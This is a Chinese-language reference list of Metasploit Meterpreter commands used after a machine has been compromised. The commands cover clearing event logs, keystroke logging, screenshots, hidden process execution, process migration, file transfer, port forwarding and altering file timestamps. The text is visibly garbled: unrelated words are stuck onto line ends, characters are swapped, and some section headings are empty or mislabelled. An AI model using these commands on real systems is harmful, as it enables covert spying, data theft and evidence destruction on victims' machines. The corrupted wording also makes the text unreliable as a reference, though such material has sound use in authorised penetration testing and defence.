meterpreter
meterpreter是Metasploit框架中的一個擴展模塊,做爲溢出成功之後的攻擊載荷使用.爲後滲透提供了不少便捷之處shell
基礎命令
咱們進入meterpreter以後,鍵入 ? 便可進入幫助文檔. 咱們進入幫助文檔能夠看到幫助文檔被分紅了好幾個模塊...ruby
Core Commands(基礎命令)
? 幫助文檔網絡
background 讓meterprter處於後臺模式session
sessions -i [id] 與會話進行交互,id表示會話的id號框架
quit 退出會話ui
shell 得到控制檯權限(前提是在meterpreter環境下,exit退出當前shell,返回到meterpreter)spa
irb 開啓ruby終端操作系統
shutdown 關機日誌
reboot 重啓接口
clearev 清除目標機器上的事件日誌
sysinfo 查看目標系統信息 好比主機名,ip.操做系統等
getprivs 獲取儘量多的特權
getuid 查看權限
kill [pid] 殺死進程
write 給支持的信道中寫數據
execute -H -i -f cmd.exe 建立新進程cmd -H不可見,-i交互
migrate pid 將meterpreter會話移植到進程數爲pid的進程中
getpid 查看當前進程的pid
ps 查看當前活躍進程
File system Commands(文件相關)
cat 查看文件內容
show_mount 查看目標機磁盤系統
getwd 查看當前工做目錄
search -f 搜索指定文件(-h進入幫助手冊). 還能夠搜索類型. 還支持通配符. 例如 search -f *.txt ,搜索到某個文件後能夠使用cat查看
edit 對指定文件進行編輯
download 對指定文件進行下載
upload 對指定文件上傳, 後面跟上要上傳的路徑和目標系統保存的路徑
cp 複製文件. 參數等同上傳文件
rm 刪除文件
dir 列出當前目錄下的文件
mkdir 新建文件夾
rmdir 刪除文件夾
lcd 返回本機上一層目錄
lpwd 顯示本機工做路徑
Networking Commands(網絡相關)
ipconfig/ifconfig 查看網絡接口信息
route 獲取路由表信息
portfwd 端口轉發
System Commands(網絡相關)
User interface Commands(用戶界面)
screenshot 截屏
keyscan_start 開啓鍵盤監聽
keyscan_dump 導出鍵盤記錄的內容
keyscan_stop 中止鍵盤記錄的內容
getdesktop 開啓當前的meterpreter工做桌面
enumdesktops 列出全部可訪問桌面站和窗口站
Webcan Commands(攝像頭相關)
Elevate Commands(提權相關)
Timestomp 更改文件屬性(MACE)